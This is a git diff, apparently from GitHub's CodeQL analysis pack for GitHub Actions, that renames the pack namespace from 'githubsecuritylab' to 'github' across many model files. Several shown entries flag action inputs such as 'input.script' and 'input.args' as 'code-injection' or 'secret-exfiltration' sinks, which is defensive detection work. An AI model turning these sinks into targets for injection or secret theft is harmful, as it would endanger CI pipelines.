.../pyg-team_pytorch_geometric.model.yml | 2 +- .../composite-actions/python-poetry_poetry.model.yml | 2 +- .../ext/generated/composite-actions/python_mypy.model.yml | 2 +- .../composite-actions/quarto-dev_quarto-cli.model.yml | 2 +- .../ext/generated/composite-actions/quay_clair.model.yml | 2 +- .../composite-actions/quickwit-oss_quickwit.model.yml | 2 +- .../generated/composite-actions/r-lib_actions.model.yml | 2 +- .../generated/composite-actions/randombit_botan.model.yml | 2 +- .../composite-actions/raspberrypi_documentation.model.yml | 2 +- .../composite-actions/ray-project_kuberay.model.yml | 2 +- .../composite-actions/readthedocs_actions.model.yml | 2 +- .../composite-actions/reflex-dev_reflex.model.yml | 2 +- .../composite-actions/renovatebot_renovate.model.yml | 2 +- .../composite-actions/rethinkdb_rethinkdb.model.yml | 2 +- .../ext/generated/composite-actions/risc0_risc0.model.yml | 2 +- .../composite-actions/rocketchat_rocket.chat.model.yml | 2 +- .../ext/generated/composite-actions/rook_rook.model.yml | 2 +- .../generated/composite-actions/roots_trellis.model.yml | 2 +- .../ext/generated/composite-actions/ruby_debug.model.yml | 2 +- .../ext/generated/composite-actions/ruby_ruby.model.yml | 2 +- .../generated/composite-actions/rusefi_rusefi.model.yml | 2 +- .../generated/composite-actions/saltstack_salt.model.yml | 2 +- ql/lib/ext/generated/composite-actions/saltstack_salt.yml | 2 +- .../generated/composite-actions/sap_sapmachine.model.yml | 2 +- .../composite-actions/scala-native_scala-native.model.yml | 2 +- .../generated/composite-actions/scitools_iris.model.yml | 2 +- .../composite-actions/scylladb_scylla-operator.model.yml | 2 +- .../composite-actions/shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shakacode_react-webpack-rails-tutorial.model.yml | 2 +- .../composite-actions/simple-icons_simple-icons.model.yml | 2 +- .../generated/composite-actions/slint-ui_slint.model.yml | 2 +- .../composite-actions/solidusio_solidus.model.yml | 2 +- .../generated/composite-actions/solo-io_gloo.model.yml | 2 +- .../generated/composite-actions/sonarr_sonarr.model.yml | 2 +- .../composite-actions/sonic-pi-net_sonic-pi.model.yml | 2 +- .../composite-actions/spacedriveapp_spacedrive.model.yml | 2 +- .../composite-actions/spockframework_spock.model.yml | 2 +- .../composite-actions/spring-io_initializr.model.yml | 2 +- .../composite-actions/spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- .../spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../composite-actions/square_workflow-kotlin.model.yml | 2 +- .../composite-actions/stefanprodan_podinfo.model.yml | 2 +- .../ext/generated/composite-actions/stellar_go.model.yml | 2 +- .../composite-actions/streetsidesoftware_cspell.model.yml | 4 ++-- .../generated/composite-actions/subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../composite-actions/tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../composite-actions/tensorflow_datasets.model.yml | 2 +- .../composite-actions/texstudio-org_texstudio.model.yml | 2 +- .../composite-actions/toeverything_affine.model.yml | 2 +- .../composite-actions/treeverse_lakefs.model.yml | 2 +- .../composite-actions/trezor_trezor-firmware.model.yml | 2 +- .../generated/composite-actions/tribler_tribler.model.yml | 2 +- .../composite-actions/trunk-io_trunk-action.model.yml | 2 +- .../generated/composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../generated/composite-actions/vercel_turbo.model.yml | 2 +- .../composite-actions/vesoft-inc_nebula.model.yml | 2 +- .../ext/generated/composite-actions/vkcom_vkui.model.yml | 2 +- .../composite-actions/vuetifyjs_vuetify.model.yml | 2 +- .../generated/composite-actions/wagoodman_dive.model.yml | 2 +- .../walletconnect_walletconnectswiftv2.model.yml | 2 +- .../ext/generated/composite-actions/wazuh_wazuh.model.yml | 2 +- .../composite-actions/web-infra-dev_rspack.model.yml | 2 +- .../composite-actions/webassembly_wabt.model.yml | 2 +- .../ext/generated/composite-actions/wntrblm_nox.model.yml | 2 +- .../generated/composite-actions/xrplf_rippled.model.yml | 2 +- .../ext/generated/composite-actions/zcash_zcash.model.yml | 2 +- .../generated/composite-actions/zenml-io_zenml.model.yml | 2 +- .../generated/composite-actions/zeroc-ice_ice.model.yml | 2 +- .../reusable-workflows/0xpolygon_polygon-edge.model.yml | 2 +- .../ext/generated/reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../generated/reusable-workflows/adap_flower.model.yml | 2 +- .../reusable-workflows/aio-libs_multidict.model.yml | 2 +- .../generated/reusable-workflows/aio-libs_yarl.model.yml | 2 +- .../reusable-workflows/airbytehq_airbyte.model.yml | 2 +- .../reusable-workflows/alphagov_collections.model.yml | 2 +- .../reusable-workflows/alphagov_frontend.model.yml | 2 +- .../reusable-workflows/alphagov_publishing-api.model.yml | 2 +- .../generated/reusable-workflows/apache_druid.model.yml | 2 +- .../generated/reusable-workflows/apache_flink.model.yml | 2 +- .../generated/reusable-workflows/apache_spark.model.yml | 2 +- .../reusable-workflows/argilla-io_argilla.model.yml | 2 +- .../reusable-workflows/argoproj_argo-cd.model.yml | 2 +- .../reusable-workflows/argoproj_argo-rollouts.model.yml | 2 +- .../reusable-workflows/aws-amplify_amplify-ui.model.yml | 2 +- .../generated/reusable-workflows/azure_apiops.model.yml | 2 +- .../reusable-workflows/azure_mlops-templates.model.yml | 2 +- .../reusable-workflows/bbq-beets_avocaddo-cmw.model.yml | 2 +- .../reusable-workflows/bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../reusable-workflows/bridgecrewio_checkov.model.yml | 2 +- .../reusable-workflows/bugsnag_bugsnag-ruby.model.yml | 2 +- .../bytecodealliance_wasm-micro-runtime.model.yml | 2 +- .../reusable-workflows/celo-org_celo-blockchain.model.yml | 2 +- .../reusable-workflows/cemu-project_cemu.model.yml | 2 +- .../reusable-workflows/cesiumgs_cesium-unreal.model.yml | 2 +- .../ext/generated/reusable-workflows/cgal_cgal.model.yml | 2 +- .../reusable-workflows/checkstyle_checkstyle.model.yml | 2 +- .../reusable-workflows/chia-network_actions.model.yml | 2 +- .../reusable-workflows/chipsalliance_chisel.model.yml | 2 +- .../reusable-workflows/clickhouse_clickhouse.model.yml | 2 +- .../reusable-workflows/cloudfoundry_cli.model.yml | 2 +- ...loudposse_github-action-matrix-outputs-write.model.yml | 2 +- .../generated/reusable-workflows/cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../reusable-workflows/com-lihaoyi_mill.model.yml | 2 +- .../generated/reusable-workflows/cosmos_ibc-go.model.yml | 2 +- .../reusable-workflows/crowdsecurity_crowdsec.model.yml | 2 +- .../reusable-workflows/cryptomator_cryptomator.model.yml | 2 +- .../reusable-workflows/daeuniverse_dae.model.yml | 2 +- .../reusable-workflows/dafny-lang_dafny.model.yml | 2 +- .../generated/reusable-workflows/dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../reusable-workflows/datadog_dd-trace-go.model.yml | 2 +- .../reusable-workflows/datadog_dd-trace-py.model.yml | 2 +- .../reusable-workflows/datafuselabs_databend.model.yml | 2 +- .../reusable-workflows/dbt-labs_dbt-bigquery.model.yml | 2 +- .../reusable-workflows/dbt-labs_dbt-core.model.yml | 2 +- .../reusable-workflows/dbt-labs_dbt-snowflake.model.yml | 2 +- .../reusable-workflows/decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- .../dependencytrack_dependency-track.model.yml | 2 +- .../reusable-workflows/devexpress_testcafe.model.yml | 2 +- .../generated/reusable-workflows/dfhack_dfhack.model.yml | 2 +- .../reusable-workflows/docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../reusable-workflows/earthly_earthly.model.yml | 2 +- .../reusable-workflows/eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 ++-- .../reusable-workflows/envoyproxy_envoy.model.yml | 2 +- .../generated/reusable-workflows/etcd-io_bbolt.model.yml | 2 +- .../generated/reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../reusable-workflows/eventstore_eventstore.model.yml | 2 +- .../generated/reusable-workflows/expensify_app.model.yml | 2 +- .../external-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../reusable-workflows/falcosecurity_falco.model.yml | 2 +- .../reusable-workflows/fastify_fastify.model.yml | 2 +- .../reusable-workflows/ferretdb_ferretdb.model.yml | 2 +- .../reusable-workflows/filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../reusable-workflows/flarum_framework.model.yml | 2 +- .../reusable-workflows/fluent_fluent-bit.model.yml | 2 +- .../reusable-workflows/flux-iac_tofu-controller.model.yml | 2 +- .../generated/reusable-workflows/flyteorg_flyte.model.yml | 2 +- .../reusable-workflows/foundatiofx_foundatio.model.yml | 2 +- .../reusable-workflows/freecad_freecad.model.yml | 2 +- .../reusable-workflows/getpelican_pelican.model.yml | 2 +- .../reusable-workflows/getporter_porter.model.yml | 2 +- .../reusable-workflows/getsentry_sentry-dart.model.yml | 2 +- .../reusable-workflows/getsentry_sentry-unity.model.yml | 2 +- .../reusable-workflows/gitpod-io_gitpod.model.yml | 2 +- .../reusable-workflows/gittools_gitversion.model.yml | 2 +- .../googlecloudplatform_magic-modules.model.yml | 2 +- .../googlecloudplatform_nodejs-docs-samples.model.yml | 2 +- .../reusable-workflows/gravitational_teleport.model.yml | 2 +- .../reusable-workflows/gravitl_netmaker.model.yml | 2 +- .../ext/generated/reusable-workflows/h2oai_wave.model.yml | 2 +- .../reusable-workflows/hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../reusable-workflows/hashicorp_boundary.model.yml | 2 +- .../reusable-workflows/hashicorp_consul.model.yml | 2 +- .../reusable-workflows/hashicorp_terraform-cdk.model.yml | 2 +- .../hashicorp_terraform-provider-tfe.model.yml | 2 +- .../reusable-workflows/hashicorp_terraform.model.yml | 2 +- .../reusable-workflows/hashicorp_vault.model.yml | 4 ++-- .../ext/generated/reusable-workflows/heroku_cli.model.yml | 2 +- .../reusable-workflows/hitobito_hitobito.model.yml | 4 ++-- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../reusable-workflows/huggingface_doc-builder.model.yml | 2 +- .../reusable-workflows/huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../ext/generated/reusable-workflows/ibm_sarama.model.yml | 2 +- ...d-photos-downloader_icloud_photos_downloader.model.yml | 2 +- .../reusable-workflows/immich-app_immich.model.yml | 2 +- .../generated/reusable-workflows/inria_spoon.model.yml | 2 +- .../intel_intel-device-plugins-for-kubernetes.model.yml | 2 +- .../reusable-workflows/inverse-inc_packetfence.model.yml | 2 +- .../ext/generated/reusable-workflows/ispc_ispc.model.yml | 2 +- .../jetbrains_intellij-platform-gradle-plugin.model.yml | 2 +- .../reusable-workflows/jupyter_docker-stacks.model.yml | 2 +- .../reusable-workflows/kairos-io_kairos.model.yml | 2 +- .../generated/reusable-workflows/kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../generated/reusable-workflows/kiali_kiali.model.yml | 2 +- .../generated/reusable-workflows/kotest_kotest.model.yml | 2 +- .../reusable-workflows/kubernetes_ingress-nginx.model.yml | 2 +- .../reusable-workflows/kubescape_kubescape.model.yml | 2 +- .../reusable-workflows/kubeshop_botkube.model.yml | 4 ++-- .../generated/reusable-workflows/kumahq_kuma.model.yml | 2 +- .../generated/reusable-workflows/labring_sealos.model.yml | 2 +- .../reusable-workflows/laion-ai_open-assistant.model.yml | 2 +- .../reusable-workflows/learningequality_kolibri.model.yml | 2 +- .../reusable-workflows/lensesio_stream-reactor.model.yml | 2 +- .../reusable-workflows/leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../reusable-workflows/liquibase_liquibase.model.yml | 2 +- .../reusable-workflows/litestar-org_litestar.model.yml | 2 +- .../ext/generated/reusable-workflows/llvm_circt.model.yml | 2 +- .../generated/reusable-workflows/lnbits_lnbits.model.yml | 2 +- .../generated/reusable-workflows/lutris_lutris.model.yml | 2 +- .../generated/reusable-workflows/mailu_mailu.model.yml | 2 +- .../reusable-workflows/mamba-org_mamba.model.yml | 2 +- .../manticoresoftware_manticoresearch.model.yml | 2 +- .../reusable-workflows/marcelotduarte_cx_freeze.model.yml | 2 +- ...rialdesigninxaml_materialdesigninxamltoolkit.model.yml | 2 +- .../reusable-workflows/matter-labs_zksync-era.model.yml | 2 +- .../reusable-workflows/mattermost_desktop.model.yml | 2 +- .../reusable-workflows/mattermost_mattermost.model.yml | 2 +- .../reusable-workflows/mealie-recipes_mealie.model.yml | 2 +- .../reusable-workflows/meshery_meshery.model.yml | 2 +- .../reusable-workflows/meshtastic_firmware.model.yml | 2 +- .../reusable-workflows/microcks_microcks.model.yml | 2 +- .../microsoft_applicationinsights-java.model.yml | 2 +- .../reusable-workflows/microsoft_chat-copilot.model.yml | 2 +- .../reusable-workflows/microsoft_msquic.model.yml | 2 +- .../generated/reusable-workflows/microsoft_oryx.model.yml | 2 +- .../reusable-workflows/microsoft_pr-metrics.model.yml | 2 +- .../microsoft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../generated/reusable-workflows/moby_buildkit.model.yml | 2 +- .../ext/generated/reusable-workflows/moby_moby.model.yml | 2 +- .../reusable-workflows/mosaicml_composer.model.yml | 2 +- .../reusable-workflows/msys2_setup-msys2.model.yml | 2 +- .../generated/reusable-workflows/mudler_localai.model.yml | 2 +- .../reusable-workflows/mustardchef_wsabuilds.model.yml | 2 +- .../ext/generated/reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../generated/reusable-workflows/napari_napari.model.yml | 2 +- .../generated/reusable-workflows/nasa_fprime.model.yml | 2 +- .../reusable-workflows/nautobot_nautobot.model.yml | 2 +- .../ext/generated/reusable-workflows/nektos_act.model.yml | 2 +- .../reusable-workflows/neondatabase_neon.model.yml | 2 +- .../generated/reusable-workflows/neovim_neovim.model.yml | 2 +- .../reusable-workflows/nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../reusable-workflows/newrelic_node-newrelic.model.yml | 2 +- .../reusable-workflows/nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../generated/reusable-workflows/nocodb_nocodb.model.yml | 2 +- .../generated/reusable-workflows/novuhq_novu.model.yml | 2 +- .../generated/reusable-workflows/npm_abbrev-js.model.yml | 2 +- ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml | 2 +- .../reusable-workflows/npm_fs-minipass.model.yml | 2 +- .../reusable-workflows/npm_hosted-git-info.model.yml | 2 +- ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml | 2 +- .../npm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../reusable-workflows/npm_mute-stream.model.yml | 2 +- .../reusable-workflows/npm_node-semver.model.yml | 2 +- .../generated/reusable-workflows/npm_node-which.model.yml | 2 +- .../ext/generated/reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../reusable-workflows/npm_write-file-atomic.model.yml | 2 +- .../generated/reusable-workflows/onflow_cadence.model.yml | 2 +- .../reusable-workflows/open-goal_jak-project.model.yml | 2 +- .../open-telemetry_opentelemetry-demo.model.yml | 2 +- .../open-telemetry_opentelemetry-dotnet-contrib.model.yml | 2 +- .../open-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...telemetry_opentelemetry-java-instrumentation.model.yml | 2 +- .../open-telemetry_opentelemetry-js-contrib.model.yml | 2 +- .../open-telemetry_opentelemetry-operator.model.yml | 2 +- .../reusable-workflows/openbao_openbao.model.yml | 2 +- .../reusable-workflows/openhab_openhab-docs.model.yml | 2 +- .../reusable-workflows/openmined_pysyft.model.yml | 2 +- .../reusable-workflows/opentofu_opentofu.model.yml | 2 +- .../reusable-workflows/openttd_openttd.model.yml | 2 +- .../reusable-workflows/openvinotoolkit_openvino.model.yml | 2 +- .../generated/reusable-workflows/openxla_iree.model.yml | 2 +- .../generated/reusable-workflows/openzfs_zfs.model.yml | 2 +- .../operator-framework_java-operator-sdk.model.yml | 2 +- .../reusable-workflows/orange-opensource_hurl.model.yml | 2 +- .../paolosalvatori_servicebusexplorer.model.yml | 2 +- .../reusable-workflows/parcel-bundler_parcel.model.yml | 2 +- .../reusable-workflows/pardeike_harmony.model.yml | 2 +- .../generated/reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../reusable-workflows/pennylaneai_pennylane.model.yml | 2 +- .../pinecone-io_pinecone-python-client.model.yml | 2 +- .../generated/reusable-workflows/pixie-io_pixie.model.yml | 2 +- .../reusable-workflows/plantuml_plantuml.model.yml | 2 +- .../generated/reusable-workflows/powerdns_pdns.model.yml | 2 +- .../reusable-workflows/preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../reusable-workflows/product-os_flowzone.model.yml | 2 +- .../reusable-workflows/project-oak_oak.model.yml | 2 +- .../ext/generated/reusable-workflows/prql_prql.model.yml | 2 +- .../generated/reusable-workflows/pulumi_pulumi.model.yml | 2 +- .../reusable-workflows/puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../generated/reusable-workflows/pyo3_maturin.model.yml | 2 +- .../ext/generated/reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../generated/reusable-workflows/python_cpython.model.yml | 2 +- .../reusable-workflows/pytorch_botorch.model.yml | 2 +- .../generated/reusable-workflows/pytorch_xla.model.yml | 2 +- .../reusable-workflows/quarto-dev_quarto-cli.model.yml | 2 +- .../reusable-workflows/rancher_dashboard.model.yml | 2 +- .../reusable-workflows/rasterio_rasterio.model.yml | 2 +- .../reusable-workflows/redisearch_redisearch.model.yml | 2 +- .../reusable-workflows/remix-run_remix.model.yml | 2 +- .../reusable-workflows/rmcrackan_libation.model.yml | 2 +- .../reusable-workflows/rocketchat_rocket.chat.model.yml | 2 +- .../generated/reusable-workflows/ruby_ruby.wasm.model.yml | 2 +- .../reusable-workflows/rustdesk_rustdesk.model.yml | 2 +- .../reusable-workflows/saadeghi_daisyui.model.yml | 2 +- .../generated/reusable-workflows/sagemath_sage.model.yml | 2 +- .../reusable-workflows/schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../reusable-workflows/seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../reusable-workflows/shimataro_ssh-key-action.model.yml | 2 +- .../reusable-workflows/softfever_orcaslicer.model.yml | 2 +- .../software-mansion_react-native-reanimated.model.yml | 2 +- .../reusable-workflows/solana-labs_solana.model.yml | 2 +- .../generated/reusable-workflows/sonarr_sonarr.model.yml | 2 +- .../reusable-workflows/speedb-io_speedb.model.yml | 2 +- .../spring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../reusable-workflows/sqlfluff_sqlfluff.model.yml | 2 +- .../reusable-workflows/stdlib-js_stdlib.model.yml | 2 +- .../reusable-workflows/stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 ++-- .../generated/reusable-workflows/supabase_auth.model.yml | 2 +- .../generated/reusable-workflows/supabase_cli.model.yml | 2 +- .../generated/reusable-workflows/tencent_hippy.model.yml | 4 ++-- .../reusable-workflows/tgstation_tgstation.model.yml | 2 +- .../reusable-workflows/thesofproject_sof.model.yml | 2 +- .../generated/reusable-workflows/tiann_kernelsu.model.yml | 2 +- .../reusable-workflows/tiledb-inc_tiledb.model.yml | 2 +- .../reusable-workflows/toeverything_affine.model.yml | 2 +- .../generated/reusable-workflows/tracel-ai_burn.model.yml | 2 +- .../reusable-workflows/tribler_tribler.model.yml | 2 +- .../reusable-workflows/ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../generated/reusable-workflows/urbit_urbit.model.yml | 2 +- .../reusable-workflows/uyuni-project_uyuni.model.yml | 2 +- .../reusable-workflows/vert-x3_vertx-hazelcast.model.yml | 2 +- .../ext/generated/reusable-workflows/vkcom_vkui.model.yml | 2 +- .../reusable-workflows/walletconnect_web3modal.model.yml | 2 +- .../reusable-workflows/warzone2100_warzone2100.model.yml | 2 +- .../reusable-workflows/wasmedge_wasmedge.model.yml | 2 +- .../reusable-workflows/web-infra-dev_rspack.model.yml | 2 +- .../ext/generated/reusable-workflows/werf_werf.model.yml | 2 +- .../reusable-workflows/widdix_aws-cf-templates.model.yml | 2 +- .../reusable-workflows/wildfly_wildfly.model.yml | 2 +- .../generated/reusable-workflows/yt-dlp_yt-dlp.model.yml | 2 +- .../generated/reusable-workflows/zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../reusable-workflows/zitadel_zitadel.model.yml | 4 ++-- ql/lib/ext/getsentry_action-release.model.yml | 2 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- ql/lib/ext/go-semantic-release_action.model.yml | 2 +- ql/lib/ext/golangci_golangci-lint-action.model.yml | 2 +- ql/lib/ext/gonuit_heroku-docker-deploy.model.yml | 2 +- ql/lib/ext/goreleaser_goreleaser-action.model.yml | 2 +- .../gr2m_create-or-update-pull-request-action.model.yml | 2 +- ql/lib/ext/gradle_gradle-build-action.model.yml | 2 +- ql/lib/ext/haya14busa_action-cond.model.yml | 2 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/ilammy_setup-nasm.model.yml | 2 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 2 +- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ql/lib/ext/jamesives_github-pages-deploy-action.model.yml | 2 +- ql/lib/ext/jitterbit_get-changed-files.model.yml | 2 +- ql/lib/ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 2 +- ql/lib/ext/jurplel_install-qt-action.model.yml | 2 +- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 ++-- ql/lib/ext/khan_pull-request-comment-trigger.model.yml | 2 +- ...arsoner_circleci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-luarocks.model.yml | 2 +- ql/lib/ext/lucasbento_auto-close-issues.model.yml | 2 +- .../ext/mad9000_actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 2 +- ql/lib/ext/manusa_actions-setup-minikube.model.yml | 2 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 ++-- ql/lib/ext/meteorengineer_setup-meteor.model.yml | 2 +- ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 2 +- ql/lib/ext/mishakav_pytest-coverage-comment.model.yml | 2 +- .../ext/mr-smithers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/msys2_setup-msys2.model.yml | 2 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 4 ++-- ql/lib/ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 2 +- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- ql/lib/ext/paambaati_codeclimate-action.model.yml | 2 +- ql/lib/ext/peter-evans_create-pull-request.model.yml | 2 +- .../ext/peter-murray_issue-body-parser-action.model.yml | 2 +- ql/lib/ext/plasmicapp_plasmic-action.model.yml | 2 +- ql/lib/ext/preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/py-actions_flake8.model.yml | 2 +- ql/lib/ext/py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 2 +- .../ext/reactivecircus_android-emulator-runner.model.yml | 2 +- .../redhat-plumbers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 2 +- ql/lib/ext/renovatebot_github-action.model.yml | 2 +- ql/lib/ext/roots_issue-closer-action.model.yml | 2 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 ++-- .../salsify_action-detect-and-tag-new-version.model.yml | 4 ++-- ql/lib/ext/sergeysova_jq-action.model.yml | 2 +- ql/lib/ext/shallwefootball_upload-s3-action.model.yml | 2 +- ql/lib/ext/shogo82148_actions-setup-perl.model.yml | 2 +- ql/lib/ext/skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- ql/lib/ext/stackhawk_hawkscan-action.model.yml | 2 +- ql/lib/ext/step-security_harden-runner.model.yml | 2 +- ql/lib/ext/suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 2 +- ql/lib/ext/trilom_file-changes-action.model.yml | 2 +- ql/lib/ext/tripss_conventional-changelog-action.model.yml | 2 +- ql/lib/ext/tryghost_action-deploy-theme.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 2 +- ql/lib/ext/wearerequired_lint-action.model.yml | 2 +- ql/lib/ext/webfactory_ssh-agent.model.yml | 2 +- ql/lib/ext/workflow-models/workflow-models.yml | 8 ++++---- ql/lib/ext/xt0rted_slash-command-action.model.yml | 2 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 2 +- ql/lib/ext/zaproxy_action-full-scan.model.yml | 2 +- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 4 ++-- ql/test/qlpack.yml | 6 +++--- 748 files changed, 777 insertions(+), 777 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 7bb3039fe486..7281eb9d9b51 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "javascript", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "github/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 08c4b420a4ca..5b06b007d8ae 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -26,7 +26,7 @@ export async function newCodeQL(): Promise { return { language: "javascript", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "github/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index b897e8f2c5a4..5687a9729fca 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml index 3a5b34880b95..87620afac709 100644 --- a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml +++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 20abd5328727..f02d8f5b180a 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index dcc20433483f..77df62717b0d 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ 